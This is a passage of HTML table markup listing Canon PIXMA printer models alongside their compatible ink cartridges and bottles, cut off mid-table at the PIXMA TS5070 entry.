(Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP610</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP628</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP638</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP648</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800R</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP810</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP830</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"7\" align=\"center\">PIXMA MP970</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP988</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP996</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n  <tr align=\"center\">\n    <td width=\"170\"><strong>Model</strong></td>\n    <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX308</td>\n    <td>CL-41 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-831 (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-40 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-40/CL-41 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-830 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX328</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX338</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX347</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX366</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"6\" align=\"center\">PIXMA MX426</td>\n    <td>CL-811 (Colour)</td>\n  </tr>\n  <tr>\n    <td>CL-811XL (Colour)</td>\n  </tr>\n  <tr>\n    <td>PG-810 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td>PG-810 Twin Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810/CL-811 Value Pack</td>\n  </tr>\n  <tr>\n    <td>PG-810XL (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX876</td>\n    <td>CLI-821 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-821 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-820 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"5\" align=\"center\">PIXMA MX886</td>\n    <td>CLI-726 (Black)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>CLI-726 (Yellow)</td>\n  </tr>\n  <tr>\n    <td>PGI-725 (Pigment Black)</td>\n  </tr>\n  <tr>\n    <td rowspan=\"12\" align=\"center\">PIXMA PRO-1</td>\n    <td>PGI-29 (Chroma Optimizer)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Dark Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Light Gray)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Matte Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Black)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Cyan)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Photo Magenta)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Red)</td>\n  </tr>\n  <tr>\n    <td>PGI-29 (Yellow)</td>\n  </tr>\n  </tbody>\n</table>\n<table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA PRO-10</td>\n      <td>PGI-72 (Chroma Optimizer)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Gray)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Matte Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Red)</td>\n    </tr>\n    <tr>\n      <td>PGI-72 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"8\" align=\"center\">PIXMA PRO-100</td>\n      <td>CLI-42 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Light Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-42 (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TR8570</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS207</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA TS307</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TS5070</td>\n      